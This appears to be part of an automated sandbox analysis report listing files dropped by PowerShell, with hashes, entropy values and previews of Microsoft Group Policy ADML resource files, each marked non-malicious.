Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowRemoteShellAccess">Allow Remote Shell Access</string>.. <string id="AllowRemoteShellAccess_Help">This policy setting configures access to remote shells.....If you enable this policy setting and set it to False, new remote shell connections are rejected by the server.....If you disable or do not configure this policy setting, new remote shell connections are allowed.</string>.. <string id="IdleTimeout">Specify idle Timeout</string>.. <string id="IdleTimeout_Help">This policy setting configures th
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1011
Entropy (8bit):5.086298346478668
Encrypted:false
SSDEEP:24:2dgeD5eo8x4+cCk2q1qOyENX/itRgv8FFV:cgeD5x8lcT/XNUFFV
MD5:14AEA48E9379243660E8B568A71EF533
SHA1:1EACA2C4A36AB2762757FA7CAA1D4256910ECC95
SHA-256:A96786FAA32516C2738C2EC94E676F3D339732AB39318D7CDFFA478A2BAE1231
SHA-512:24AF5CA8EB9650B61FF0A01467A36DD3F55C90741A4FD04C067420A3E150B57F50ADD536513B4D3F0E7A1EC37138205850FFAAED51A1525E1F063C737EFB50E7
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Server 2008 base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by server components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008">At least Windows Server 2008</string>.. <string id="SUPPORTED_WindowsServer2003R2">At least Windows Server 2003 R2</string>.. <string id="ServerComponents">Server Components</string>.. <string id="ServerComponents_Help">Contains settings for server operating system components.</string>.. </stringTable>.. </resources>..</policyDefinitionR
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (561), with CRLF line terminators
Category:dropped
Size (bytes):34731
Entropy (8bit):4.71530009460394
Encrypted:false
SSDEEP:384:xtl2CSosXR2nMZIvHWRzwjxqDx6rUtuLTaUL4wl2bux0AcY5Bnn6aaF8MSaUVNKl:xtlwhQMZI/W5w8t6rjxXcYXnhaa3Tu
MD5:1B4DF1C94FAE81C341ABEA40C9ADAD9C
SHA1:7DBDE04EFAF2D6B703417CC6FB0B146D6FD4214F
SHA-256:2AEC8DCD9608B57D3D65321B399FAA530552027F0E3CA814F477816DF803E201
SHA-512:4CFCE39BA34EE283EEC89900AFCA583AE9C0AE86CAA3EE8EC90891347825AF81DD82BD08960551852C6B7C8FD77B5ECDE9BA75C16A3986B7663CB494E3C6E30A
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->.. .. Note that white space is preserved as is in the text shown in the Group Policy UI... Don't add extra line breaks at the beginning and end of text strings,.. and make sure that lines of text start in the FIRST column... -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WU_SUPPORTED_Windows7ToXPSP2">Windows 7, Windows Server 2008 R2, Windows Vista, Windows XP SP2</string>.. <string id="WU_SUPPORTED_Windows7_To_Win2kSP3_Or_XPSP1">Windows 7, Windows Server 2008 R2, Windows Vista, Windows Server 2003, Windows XP SP2, Windows XP SP1 , Windows 2000
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
Category:dropped
Size (bytes):1453
Entropy (8bit):4.91354096133356
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQ2X/L2jnwwvXzAd7l4d7FFV:cgeD5x8gm8fKj2T27NmEFV
MD5:76D4B8899387BCD0C081D4301E1B18DE
SHA1:EBC1DD18A8893ED391379021941451D89692CDCD
SHA-256:41331BF31C4BA79B1FF7169EFA27CF37AEE5ED269C1C6894AF78F3F6FB40AE59
SHA-512:629E37A4E24C60A3E34795F17A5E132DBDAEF40F43AF01B451F6024A4FFC93D36F0381B0B413CE2374778C9D50326345BF0B460D7CCD8F8B5CB1A747CD66F1FF
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBlockingAppsAtShutdown">Turn off automatic termination of applications that block or cancel shutdown</string>.. <string id="AllowBlockingAppsAtShutdown_Explain">This policy setting specifies whether Windows will allow console applications and GUI applications without visible top-level windows to block or cancel shutdown. By default, such applications are automatically terminated if they attempt to cancel shutdown or block it indefinitely.....If you enable this setting, console applications or GUI applicat
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2619
Entropy (8bit):4.83283675002977
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKEupdt44XktQFqMQFbC1RARWJUudgJjT5YMcxL5oV:LeD5pmBhIQwMQE1E5Pk9oV
MD5:A5FE2005E14E5E7E8792CE0C2BDF53A8
SHA1:D4EE1B57FE5C5387E241B51F6209DDD45A6D5BE4
SHA-256:8CB5F08BC1D73EE9C83EF7043A8BDA0CF250E7BEDD1C84E700E6A8A913BEAF86
SHA-512:332BF547D8883DF20AA82D2C6F9E3DCD89E2997EC16436A377F6135DF1136B595A9B91EB91C70BD3068F71EBA72007C4DAE32D3B0584A5FB392A9158A57036B7
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomSearch">Custom Instant Search Internet search provider</string>.. <string id="CustomSearch_Explain">Set up the menu name and URL for the custom Internet search provider.....If you enable this setting, the specified menu name and URL will be used for Internet searches.....If you disable or not configure this setting, the default Internet search provider will be used.</string>.. <string id="NoSearchInternetInWordWheel">Hide the "Search the Internet" link from the Search box drop down.</string>..
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (591), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3464
                                                                                                                                                                                                        Entropy (8bit):4.792120480185555
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cmD5x8gm8fK9186+SciILEl1h8gCgU+7AJcih/qAUJhbWEPIV:PD5pmh186+Sc8h8XrJcEQJxWEPIV
                                                                                                                                                                                                        MD5:F6075FA597F6343205F02CFAF7CF87A7
                                                                                                                                                                                                        SHA1:7A1F11393676AF8A2B8C95EEDE05007A6F2DB31E
                                                                                                                                                                                                        SHA-256:B6A4F7EBE7A44F81B7A5D4C7A38FEA3FCFCD184FA16E46863C1535323197BE1A
                                                                                                                                                                                                        SHA-512:40358DE36BFC342FE314B6FADACA3B1523BB05658F792F1306FC0E4334E50CADD55777069F59E0483C77A5D13C07293909F4BD2596757EF7B2D3504D37522A9A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_WorkFolders">Work Folders</string>.. <string id="Pol_MachineEnableWorkFolders">Force automatic setup for all users</string>.. <string id="Pol_MachineEnableWorkFolders_Help">This policy setting specifies whether Work Folders should be set up automatically for all users of the affected computer... ..If you enable this policy setting, Work Folders will be set up automatically for all users of the affected computer. This prevents users from choosing not to use Work Folders on the computer; it also pr
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1317
                                                                                                                                                                                                        Entropy (8bit):5.059573414260519
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2d1D5eo8gWt4+3FGxiKRI/LeVQLhqeS1FLiRj/eRBAlA5TtT849eLaa6rTM7ijFV:c1D5x8gmjKhGLJ8uwdxPkOr1jFV
                                                                                                                                                                                                        MD5:68E7E1BEE13094C1C0F9896F82B4D741
                                                                                                                                                                                                        SHA1:5D7F87C220EA3EB57322C9FC0986B2EFCAEBB01A
                                                                                                                                                                                                        SHA-256:4754F8A9B020216A0F9CA4C7357A6794D3C98735D9B7857FCBC19ED1401021E3
                                                                                                                                                                                                        SHA-512:6CCD89B24AC4D9232D45A91E3002F69230BA38A878057ABC0A0BD07F3B7A44CC9E97BE29267CBB56C9D3304EC9CA75C3E662DA1D2E154F3155A029F30C6ACF91
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2013 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Automatically workplace join client computers</displayName>.. <description>This setting lets you configure how domain-joined client computers become workplace-joined with domain users in your organization.</description>.. <resources>.. <stringTable>.. <string id="WJ_WorkplaceJoinCategory">Workplace Join</string>.. <string id="WJ_AutoJoinExplain">This setting lets you configure how domain joined client computers become workplace joined with domain users at your organization.....If this setting is enabled, domain-joined client computers will automatically become workplace-joined upon domain user logon.....Note: Additional requirements may appl
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1812
                                                                                                                                                                                                        Entropy (8bit):4.867263783263397
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKe92tf3bDtMsabsl5/n0BshFV:LeD5pmk2tf/Ojbg1nCshFV
                                                                                                                                                                                                        MD5:418D7AC091847AB77D095C57FA41A684
                                                                                                                                                                                                        SHA1:3344D9A7DF3250DC67E0AE77A3852504B57FD45D
                                                                                                                                                                                                        SHA-256:1264F3A19797D8DAEE79006048CF0430FC85D1FA8AAC8C64C5A60351C7753901
                                                                                                                                                                                                        SHA-512:86C39CFFAC76B5417780116DCD6E264C05939C52D7E8920330FABC657AFC34EE9EC0C09EDB871B9F6B3E9C75CD1E12029B29DF6A8D12CB24A8D3810D71BDB8D2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Fault Tolerant Heap</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting permits or prohibits the Diagnostic Policy Service (DPS) from automatically resolving any heap corruption problems.....If you enable this policy setting, the DPS detects, troubleshoots, and attempts to resolve automatically any heap corruption problems.....If you disable this policy setting, Windows cann
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1509
                                                                                                                                                                                                        Entropy (8bit):4.960947634536891
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2ddD5eo8gWt4+3FWDELiHkM7QQhsrPKkoXWmWUD64WPb1KOFV:cdD5x8gmID1q+kkb967Pb0OFV
                                                                                                                                                                                                        MD5:C8F213BDF5B362440A28D5D5FDD86FB8
                                                                                                                                                                                                        SHA1:587A99FD8725FBBEF863D8D01D3993123817A8B3
                                                                                                                                                                                                        SHA-256:8A6601421A6DE212B6B1FF4990ED462251F3C4C75CB37D7BBA0AFC814B0C50F1
                                                                                                                                                                                                        SHA-512:966BE4DBF177B42253853A03B08447B48315FF51CF05C9FA88FA2A5A344CC9E02A357D7A7FAF61A831EDA39FA9AF35B88389FB8EAFE6BA72A8D7F8BCE90EFFB1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Hotspot Authentication Group Policy Settings</displayName>.. <description>Hotspot Authentication Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="HotspotAuth_Category">Hotspot Authentication</string>.. <string id="HotspotAuth_Enable">Enable Hotspot Authentication</string>.. <string id="HotspotAuth_Enable_Help">This policy setting defines whether Wi-Fi hotspots are probed for Wireless Internet Service Provider roaming (WISPr) protocol support.....If a Wi-Fi hotspot supports the WISPr protocol, users can submit credentials when manually connecting to the network. If authentication is successful, users will b
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (402), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5220
                                                                                                                                                                                                        Entropy (8bit):4.806973059665715
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmCaYOcq03f1QSxMMdeuRr48/TNZvOfxk5DxKhFwfDFpm8h7w1D7zDGFV:EPaYO503f1QSy+euRD/TNZvOfxk5DxKQ
                                                                                                                                                                                                        MD5:FE14E28C69993ACCEC221BE3C7A99E5C
                                                                                                                                                                                                        SHA1:AF4A9B9485D3CAE6BB21DC2932A705247C20EC01
                                                                                                                                                                                                        SHA-256:68B3DF1ED58900E693440D614266C2F8FA20A87F75B9183A5BEBFAB5C3C6B4C2
                                                                                                                                                                                                        SHA-512:B60557A69068D7F37CE89C724D22340E464E4DFDE039E9E4A10BE2F4458C165456872632D886EADBAA7AC72F23DAB8AF32EC1A1DAE2605EDC7D25004E878772B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="iSCSI_Category">iSCSI</string>.. <string id="iSCSIDiscovery_Category">iSCSI Target Discovery</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers">Do not allow manual configuration of iSNS servers</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers_Help">If enabled then new iSNS servers may not be added and thus new targets discovered via those iSNS servers; existing iSNS servers may not be removed. If disabled then new iSNS servers may be added and thus new targets discovered via those
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3422
                                                                                                                                                                                                        Entropy (8bit):4.718448996775859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3F+uAuj9hjwJd+ktkEbEqXf3XYonvxbBN9vBxWQcjtrh6kWR0z:cgeD5x8gmVSTuiv3Xv1IQcLzWElq2SIV
                                                                                                                                                                                                        MD5:224BEABEB0B0C06F17CD758D7F5CA442
                                                                                                                                                                                                        SHA1:5D6443E03F0345B93561D2958C725E963CE1EBCD
                                                                                                                                                                                                        SHA-256:C65DA0DF5066F72EFF8B61EDF4F7B900650462FE38260C98C43A2DFCBEEF8634
                                                                                                                                                                                                        SHA-512:17AD214FA68E221F9805472AB453B13477656AC0F7A1612F2260B369F2F1E33D0DCC2E03851A3CB72999F16EF790B56F2CC0E1C341723FD1BB0C6937FEA1B98D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Maintenance Scheduler Policies</displayName>.. <description>Maintenance Scheduler Group Policies</description>.. <resources>.. <stringTable>.. <string id="MaintenanceScheduler">Maintenance Scheduler</string>.. <string id="ActivationBoundary">Automatic Maintenance Activation Boundary</string>.. <string id="ActivationBoundaryHelp">.. This policy setting allows you to configure Automatic Maintenance activation boundary..... The maintenance activation boundary is the daily schduled time at which Automatic Maintenance starts.... If you enable this policy setting, this will override the default daily scheduled time
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (532), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8481
                                                                                                                                                                                                        Entropy (8bit):4.839330009877803
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xvEwDvJfTqcK3KoGmwrtrqGryq5hP8lv5UNgTe:xvE8fWVQpHOq5hP8vuge
                                                                                                                                                                                                        MD5:913C464CFBD79FBB24DDDB6A91D1C375
                                                                                                                                                                                                        SHA1:DE4AB693B5B746695B00E6F00EFC190D7541242F
SHA-256:6E3E490033E86709BBEAD8A1CA4F35DD478297BD932A76C3D9942DD59F8AC27F
SHA-512:346C4AA6FBC299ECC94C2CA4970A4EC4867235FD9268E4E89C2F32D526A1F75824565442B555080CD374C229D6C5ECFD2CF6B7B96DC85FCABD14F9225FE05CEB
Malicious:false
Preview:<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>DirectAccess Client Experience Settings Group Policy Template</displayName>.. <description>This admx file describes policy template for DirectAccess Client NCA component</description>.. <resources>.. <stringTable>.. <string id="NCA">DirectAccess Client Experience Settings</string>.. <string id="NCA_Help">This is the group policy template for DirectAccess Client Experience Settings. Please read the DirectAccess deployment guide for more information.</string>.. <string id="SupportEmail">Support Email Address</string>.. <string id="SupportEmail_Help">Specifies the e-mail address to be used when sending the log files that are generated by NCA to the network administrator. ....When the user sends the log files to the Administrator, NCA uses the default e-mail client to open a new message with the support email address in the To: field of the message, then attaches the generated log files

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (379), with CRLF line terminators
Category:dropped
Size (bytes):6236
Entropy (8bit):4.8210465928673445
Encrypted:false
SSDEEP:96:LeD5pm0ybro3NXRz6/LPrwwfsHO+/7Oaj3V:EDyXo3NXRz+0w0HdjtjF
MD5:78021A8DEB0981DD65154025032BB7D5
SHA1:5B59F46A232E9752D6405949564B435D1AD709B5
SHA-256:899C5FF462E34E8319AC0C59A9BC794695166970BA28495C473754FA5C3DE457
SHA-512:C4BBA2C6A05B10A74D603225CE69BF6EC3D08CF8039D56E5118774179A628A237F9119C09215C4FEB7BE5D5D06A8E5CF6B07FE2822D0AF7E65FEFD47FA9E039E
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>...... Overall category text -->.. <string id="PcaScenarioCategory">Application Compatibility Diagnostics</string>.. .... Generic WDI text -->.. <string id="WdiScenarioExecutionPolicyLevelResolution">Detection, Troubleshooting and Resolution</string>.. <string id="WdiScenarioExecutionPolicyLevelTsOnly">Detection and Troubleshooting Only</string>...... Individual scenario text -->.. <string id="DetectBlockedDriversText">Notify blocked drivers</string>.. <string id="DetectDepre

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (423), with CRLF line terminators
Category:dropped
Size (bytes):3289
Entropy (8bit):4.684667062227081
Encrypted:false
SSDEEP:48:cVD5x8gmnwOx5XzQfO4ZQZr4VdF+kHdqblrmG7FV:WD5pmnwOX4aadF+odcmG7FV
MD5:145EB767DFAAC5B7D79A9DF8C4FD6504
SHA1:EF931F6BD052785B77B640F310BB593DA3FBC881
SHA-256:F2483555C3531D0821703D3696ACBFE5528A031D762661249CD6DF8434ACCFC3
SHA-512:8B5AC9ABF5870C9F2D9708E8858121815CE875E379700E7E4797F84631802D82FFE0A32C1983CF23BD6B09D775965F0192939D03CAC6F1E5FD2B54CC55EE2602
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Scripted Diagnostics</displayName>.. <description>Scripted Diagnostics</description>.. <resources>.. <stringTable>.. <string id="ScriptedDiagnosticsCategory">Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicy">Configure Security Policy for Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicyExplain">This policy setting determines whether scripted diagnostics will execute diagnostic packages that are signed by untrusted publishers.....If you enable this policy setting, the scripted diagnostics execution engine validates the signer of any diagnostic package and runs only those signed by trust

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (472), with CRLF line terminators
Category:dropped
Size (bytes):7668
Entropy (8bit):4.73074137043816
Encrypted:false
SSDEEP:96:wNa+/IQexYsInNwFxpeHe+zpoDQzwvU9Q7nwefXvU9Q7HTV:G/In5xpe++zpoDhv8w/v80
MD5:7B04E3F4356B26D851628246DAC94705
SHA1:AB5AC1954A3652BCB12946B607C2B1F4D876DA21
SHA-256:E6F4193F29666226D72365C364E473F1F9DEB47405DFEDCA38A215EB61FFF967
SHA-512:E1A0C7A200AEDCD3FB55E64BF67A0EE9EED91C0632C178A54FA98E20D9B4C32680F17900BC66017FEF3F595A6FCA06624B2C0CF7D5B4E8490C177F3AFAC1A414
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File Classification Infrastructure Group Policy Definitions</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="AdrCat">Access-Denied Assistance</string>.. <string id="FciCat">File Classification Infrastructure</string>.. <string id="EnableManualUXDisplay">File Classification Infrastructure: Display Classification tab in File Explorer</string>.. <string id="EnableShellExecuteFileStreamCheck">Enable access-denied assistance on client for all file types</string>.. <string id="EnableShellExecuteFileStreamCheck_Descr">This Group Policy Setting should be set on Windows clients to enable access-denied assistance for all file types</string>.. <string id="EnableManualUXExplain">This policy setting controls whether the Classification

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (431), with CRLF line terminators
Category:dropped
Size (bytes):13466
Entropy (8bit):4.782394839113498
Encrypted:false
SSDEEP:96:LeD5pmjKFPT4fv3EIrv3Iv/g8/vRzZxOkRvhRkKSbHw1cZICCHzBaTBeQqqL7tgA:E6fv3EWv3Ivo8Fn/nYwrqjvigA95Zy/D
MD5:0B0DA2277FE7B257B26ED87E595CDCF5
SHA1:5F790C95E1703A243F0678FDF521772811B4D352
SHA-256:89EC65C0144936DE7A31B903D9A8DBD2E436FD098DE9AA91EAF164A5A8B6DB1B
SHA-512:581018F7E5E6ACFBB4D7E8B6BDADCA26ABE829ED1E12AAF1B86FB70857DF9B2290056B3890E969A62DA027399FA4624E1B9478679B91632AD1CE12D1A09D0250
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>TCPIP Group Policy Template file</displayName>.. <description>This admx file describes policy template for TCPIP components</description>.. <resources>.. <stringTable>.. <string id="TCPIP">TCPIP Settings</string>.. <string id="Ipv6Transition">IPv6 Transition Technologies</string>.... <string id="ISATAP_State">Set ISATAP State</string>.. <string id="ISATAP_Router_Name">Set ISATAP Router Name</string>.. <string id="6to4_State">Set 6to4 State</string>.. <string id="6to4_Router_Name">Set 6to4 Relay Name</string>.. <string id="6to4_Router_Name_Resolution_Interval">Set 6to4 Relay Name Resolution Interval</string>.. <s

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1977
Entropy (8bit):4.903195660648944
Encrypted:false
SSDEEP:48:cwD5x8gmipnasavWANaqwDtCsiFsaMQnV:lD5pmipasavWuaqwhsFsaM0V
MD5:13E20C78E89E7FC58934BCFF584E12A1
SHA1:52DCC829C427CE609034C9106460C7734BEBD3ED
SHA-256:A59E2ED355AC803474C9EF02A60076BB98ADBB33AD6AA6884AB1B4850BAC4C02
SHA-512:14C6DB1DCB97692D561C961A5A1A5F0F25BC6CC3CB28DC878CD46296339E16C36BA8A364BE4F80A42D2C27725BECDED3020DC68BE820F0343FE92A961F018966
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WLAN Service Group Policy Settings</displayName>.. <description>WLAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WlanSvc_Category">WLAN Service</string>.. <string id="NetworkCost_Category">WLAN Media Cost</string>.. <string id="SetCost">Set Cost</string>.. <string id="SetCost_Help">This policy setting configures the cost of Wireless LAN (WLAN) connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all WLAN connections on the local m

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2971
Entropy (8bit):4.817228267034193
Encrypted:false
SSDEEP:48:cwD5x8gmL0PfvW8N0qwDtCsiFcs2mANRqwDtCsiFnMlpV:lD5pmL0PfvWq0qwhsFcs2muRqwhsFnM1
MD5:761AF87D50F53F0CE9947B5D486C30FA
SHA1:DC926F9449848CCE778326607BD4787ED6C80A01
SHA-256:8F1F6C7509F5C7C27B8F6E5DCF81FB8C02AE3FFEE825F6CFA4171A712BE018D4
SHA-512:ECCF653D5935C3777F14F08C0F5318B927E230C08AAA09DEBFD09ACA23A27B0887FE94A8670B635FD7D7B6ACCF3D3DFED2BFBCD02298A5B58089D66219A7E366
Malicious:false
